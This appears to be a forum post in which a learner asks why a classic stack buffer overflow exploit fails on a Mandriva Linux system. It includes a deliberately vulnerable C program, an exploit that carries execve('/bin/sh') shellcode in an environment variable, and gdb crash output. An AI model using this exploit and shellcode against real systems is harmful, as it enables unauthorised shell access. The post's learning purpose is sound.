I try to understand better how buffer overflow works using the following good document : http://arxiv.org/pdf/cs.CR/0405073 (french language)

However, I can't reproduce an easy example (using environment) of buffer overflow on my system, I tryed other basical codes found on internet and still nothing, here is my code :

// ---- vuln2.c
#include <stdio.h>

main(int argc, char *argv[])
{
char buffer[16];

if (argc > 1)
strcpy(buffer, argv[1]);
}

// ---- ex2.c
#include <stdio.h>

#define BUFSIZE 40
#define ALIGNMENT 0

char sc[] = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

void main()
{
char *env[2] = {sc, NULL};
char buf[BUFSIZE];
int i;
int *ap = (int *)(buf + ALIGNMENT);
int ret = 0xbffffffa - strlen(sc) - strlen("/home/programming/vuln2");
for (i=0; i < BUFSIZE - 4; i += 4)
{
*ap++ = ret;
}
execle("/home/programming/vuln2", "vuln2", buf, NULL, env);
}

If I believe what I learnt, ex2 should provide a new shell :

[user@host]$ ./ex2
Erreur de segmentation (core dumped)
[user@host]$

This is not really the case... Trying to see what happens with gdb :

[user@host]$ gdb -c core.10045
GNU gdb 6.3-5mdk (Mandriva Linux release 2006.0)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandriva-linux-gnu".
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Using host libthread_db library "/lib/tls/libthread_db.so.1".
Loaded system supplied DSO at 0xffffe000

Core was generated by `foo2 '.
Program terminated with signal 11, Segmentation fault.
#0 0xbfffffc8 in ?? ()
(gdb) x/12 0xbfffffc8
0xbfffffc8: Error accessing memory address 0xbfffffc8: Aucun fichier ou rpertoire de ce type.
(gdb) p $eip
$1 = (void *) 0xbfffffc8
(gdb) p $esp
$2 = (void *) 0xbfe8fec0
(gdb) x/12 0xbfe8fec0
0xbfe8fec0: 0xbfffffc8 0xbfffffc8 0xbfffffc8 0x0804844a
0xbfe8fed0: 0x08049654 0x00000000 0xb7f93cc0 0xbfe8ff08
0xbfe8fee0: 0xbfe8fec0 0xb7e4be05 0x00000000 0x00000000
(gdb)

It's like if 0xbffffffa is not the limit address as described, do somebody understand what is wrong here ? For information my system is a Mandriva 2006 with kernel 2.6.12-12mdk-i686-up-4GB.